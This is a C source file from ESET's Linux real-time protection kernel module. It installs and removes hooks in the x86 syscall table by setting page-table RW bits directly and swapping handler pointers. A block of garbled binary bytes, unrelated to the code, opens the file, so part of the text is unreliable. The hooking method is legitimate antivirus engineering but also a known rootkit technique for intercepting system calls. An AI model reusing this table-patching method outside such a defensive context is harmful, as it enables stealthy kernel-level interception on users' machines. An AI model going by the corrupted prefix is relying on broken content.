h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
/*
 * eset_rtp (ESET Real-time file system protection module)
 * Copyright (C) 1992-2021 ESET, spol. s r.o.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 *
 * In case of any questions, you can contact us at ESET, spol. s r.o., Einsteinova 24, 851 01 Bratislava, Slovakia.
 */

#include "ertp_syscalls.h"
#include "ertp.h"

#include <linux/fcntl.h>
#include <linux/string.h>
#include <linux/types.h>
#include <asm/pgtable_types.h>

/* Base addresses of the kernel syscall tables, recorded by ertp_sys_hooks_init().
 * Both stay NULL until then; register_hook() refuses to touch a NULL table.
 * The x32 ABI shares the 64-bit table (see ertp_sys_hook_register()). */
static syscall_ptr_t *syscall_table_32b = NULL; /* 32-bit (ia32 emulation) table */
static syscall_ptr_t *syscall_table_64b = NULL; /* 64-bit (x86_64 / x32) table */

/* Per-syscall hook state, indexed by enum ertp_syscall_no. Every slot starts
 * empty (no hooked call, no saved original) for all three ABIs (x86_64, ia32,
 * x32). ertp_sys_hook_register() fills the pairs in; ertp_sys_hook_unregister()
 * clears hooked_call again. */
#define ERTP_EMPTY_HOOK { { NULL, NULL }, { NULL, NULL }, { NULL, NULL } }
struct ertp_sys_hook ertp_hooks[N_ERTP_SYSCALLS] = {
	ERTP_EMPTY_HOOK, /* ERTP_SYSCALL_OPEN */
	ERTP_EMPTY_HOOK, /* ERTP_SYSCALL_OPENAT */
	ERTP_EMPTY_HOOK, /* ERTP_SYSCALL_CLOSE */
	ERTP_EMPTY_HOOK, /* ERTP_SYSCALL_EXIT */
	ERTP_EMPTY_HOOK, /* ERTP_SYSCALL_EXIT_GROUP */
	ERTP_EMPTY_HOOK, /* ERTP_SYSCALL_EXECVE */
	ERTP_EMPTY_HOOK, /* ERTP_SYSCALL_dup2 */
	ERTP_EMPTY_HOOK, /* ERTP_SYSCALL_dup3 */
	ERTP_EMPTY_HOOK, /* ERTP_SYSCALL_unlink */
	ERTP_EMPTY_HOOK, /* ERTP_SYSCALL_unlinkat */
	ERTP_EMPTY_HOOK, /* ERTP_SYSCALL_rename */
	ERTP_EMPTY_HOOK, /* ERTP_SYSCALL_renameat */
#if (LINUX_VERSION_CODE >= KERNEL_VERSION(3,15,0))
	ERTP_EMPTY_HOOK, /* ERTP_SYSCALL_renameat2 */
#endif
};
#undef ERTP_EMPTY_HOOK

/* Record the syscall table addresses found by the caller.
 * k32 may be 0 on kernels without a 32-bit table; register_hook() then fails
 * with -EFAULT for that ABI instead of dereferencing it.
 * Returns 0, or -EEXIST if either table address was already recorded. */
int ertp_sys_hooks_init(unsigned long k32, unsigned long k64)
{
	int already_initialized = (syscall_table_32b != NULL) || (syscall_table_64b != NULL);

	if (already_initialized) {
		ertp_pr_error("attempt to double register hooks");
		return -EEXIST;
	}

	syscall_table_64b = (syscall_ptr_t *)k64;
	syscall_table_32b = (syscall_ptr_t *)k32;
	return 0;
}

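/* Enable (rw != 0) or disable (rw == 0) the Read-Write flag of the page holding
 * addr, returning the previous RW flag value: 1 if the page was writable, 0 if
 * it was read-only. Returns -EFAULT (entry untouched) if no page table entry is
 * mapped for addr.
 *
 * Callers feed the returned value back to restore the page, so the "previous"
 * value must be exact: a wrong 1 here leaves a writable mapping of the syscall
 * table behind after hooking. */
static int set_page_rw(void *addr, int rw)
{
	unsigned  level;
	pte_t    *pte = lookup_address((unsigned long)addr, &level); /* resolves the page containing addr */
	int       had_rw;

	if (!pte)
		return -EFAULT;

	/* Test the RW bit itself. The earlier form masked the bit *out* and tested
	 * the remainder, which is non-zero for any present PTE, so had_rw was always
	 * 1 and the restore call left the page writable. */
	had_rw = (pte->pte & _PAGE_RW) != 0;

	if (rw)
		pte->pte |= _PAGE_RW;
	else
		pte->pte &= ~_PAGE_RW;

	/* NOTE(review): the PTE is written directly and no TLB flush is issued;
	 * confirm whether the target kernel needs one for the change to take effect. */
	return had_rw;
}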

/* Overwrite one syscall table slot with ptr and hand back the pointer that was
 * stored there. The slot's page is made writable for the store and then put
 * back to whatever RW state set_page_rw() reported. */
static syscall_ptr_t set_syscall_table_entry(int syscall_no, syscall_ptr_t *syscall_table, void *ptr)
{
	syscall_ptr_t *slot = syscall_table + syscall_no; /* entry being replaced */
	syscall_ptr_t  old_entry = (syscall_ptr_t)(*slot);
	int            was_rw;

	ertp_pr_debug("setting systable entry at address %p to %p (prev = %p)",
		(void *)slot, ptr, (void *)old_entry);

	was_rw = set_page_rw(slot, 1);
	*slot = (syscall_ptr_t)ptr;
	(void)set_page_rw(slot, was_rw); /* restore the page's previous protection */

	return old_entry;
}

/* Install func as the handler for syscall_no in syscall_table and remember the
 * displaced handler in hook->original_call.
 * Returns -EFAULT when the table address is unknown, -EEXIST when this pair
 * already carries a hook, 0 otherwise. */
static int register_hook(int syscall_no, struct ertp_hook_pair *hook, syscall_ptr_t *syscall_table, void *func)
{
	if (syscall_table == NULL) {
		ertp_pr_error("cannot register hook, syscall table not initialized");
		return -EFAULT;
	}

	if (hook->hooked_call != NULL) {
		ertp_pr_error("attempt to double register hook");
		return -EEXIST;
	}

	printk(KERN_DEBUG ESET_RTP ": registering hook for syscall %d\n", syscall_no);

	/* Swap first, then publish: original_call holds what was displaced. */
	hook->original_call = set_syscall_table_entry(syscall_no, syscall_table, func);
	hook->hooked_call   = (syscall_ptr_t)func;

	return 0;
}

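/* Register hooks for one syscall on every ABI for which a replacement is given.
 * func64, func32 and funcx32 may each be NULL to leave that ABI alone; the
 * 32-bit and x32 paths exist only under CONFIG_IA32_EMULATION / CONFIG_X86_X32.
 *
 * Returns 0 on success, -EINVAL for a number outside ertp_hooks, or the first
 * register_hook() error (-EFAULT, -EEXIST). On a partial failure the ABIs
 * already hooked by this call stay hooked; ertp_sys_hook_unregister(number)
 * backs them out (it tolerates pairs that were never hooked). */
int ertp_sys_hook_register(enum ertp_syscall_no number, void *func64, void *func32, void *funcx32)
{
	struct ertp_sys_hook *hook;
	int err;

	/* ertp_hooks has N_ERTP_SYSCALLS entries; reject anything else before indexing */
	if ((unsigned int)number >= N_ERTP_SYSCALLS)
		return -EINVAL;

	hook = &ertp_hooks[number];

	if (func64 && (err = register_hook(ERTP_SYSCALL_NUMBERS_64[number], &hook->x86_64, syscall_table_64b, func64)) != 0)
		return err;

#ifdef CONFIG_IA32_EMULATION
	if (func32 && (err = register_hook(ERTP_SYSCALL_NUMBERS_32[number], &hook->ia32, syscall_table_32b, func32)) != 0)
		return err;
#endif

#ifdef CONFIG_X86_X32
	/* x32 syscalls live in the 64-bit table */
	if (funcx32 && (err = register_hook(ERTP_SYSCALL_NUMBERS_X32[number], &hook->x32, syscall_table_64b, funcx32)) != 0)
		return err;
#endif

	return 0;
}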

/* Put the saved original handler back into syscall_table[syscall_no] and clear
 * hook->hooked_call. Returns -EINVAL when the table address is unknown,
 * -ENOENT when this pair holds no hook, 0 otherwise. Panics (BUG_ON) if the
 * slot no longer holds our hook, i.e. the table was modified behind our back. */
static int unregister_hook(int syscall_no, struct ertp_hook_pair *hook, syscall_ptr_t *syscall_table)
{
	syscall_ptr_t displaced;

	if (syscall_table == NULL)
		return -EINVAL;

	if (hook->hooked_call == NULL || hook->original_call == NULL)
		return -ENOENT;

	displaced = set_syscall_table_entry(syscall_no, syscall_table, hook->original_call);

	/* Someone has overridden our hook? */
	BUG_ON(displaced != hook->hooked_call);

	printk(KERN_DEBUG ESET_RTP ": unregistered hook for syscall %d\n", syscall_no);

	hook->hooked_call = NULL;

	return 0;
}

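/* Remove the hooks for one syscall on every ABI. Pairs that were never hooked
 * (-ENOENT) are silently skipped; any other unregister_hook() error is logged
 * and the remaining ABIs are still processed. A number outside ertp_hooks is
 * rejected with a warning instead of being used as an index. */
void ertp_sys_hook_unregister(enum ertp_syscall_no number)
{
	struct ertp_sys_hook *hook;
	int    err;

	if ((unsigned int)number >= N_ERTP_SYSCALLS) {
		ertp_pr_warning("refusing to unregister out-of-range syscall number %d", (int)number);
		return;
	}

	hook = &ertp_hooks[number];

	err = unregister_hook(ERTP_SYSCALL_NUMBERS_64[number], &hook->x86_64, syscall_table_64b);

	if (err && err != -ENOENT) {
		ertp_pr_warning("error unregistering hook for 64-bit syscall %d", ERTP_SYSCALL_NUMBERS_64[number]);
	}

#ifdef CONFIG_IA32_EMULATION
	err = unregister_hook(ERTP_SYSCALL_NUMBERS_32[number], &hook->ia32, syscall_table_32b);

	if (err && err != -ENOENT) {
		ertp_pr_warning("error unregistering hook for 32-bit syscall %d", ERTP_SYSCALL_NUMBERS_32[number]);
	}
#endif

#ifdef CONFIG_X86_X32
	/* x32 syscalls live in the 64-bit table */
	err = unregister_hook(ERTP_SYSCALL_NUMBERS_X32[number], &hook->x32, syscall_table_64b);

	if (err && err != -ENOENT) {
		ertp_pr_warning("error unregistering hook for x32 syscall %d", ERTP_SYSCALL_NUMBERS_X32[number]);
	}
#endif
}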

/* Unregister every hook in ertp_hooks, in table order. The recorded syscall
 * table addresses are left as they are. */
void ertp_sys_hooks_unload(void)
{
	int idx = 0;

	while (idx < N_ERTP_SYSCALLS) {
		ertp_sys_hook_unregister((enum ertp_syscall_no)idx);
		idx++;
	}
}
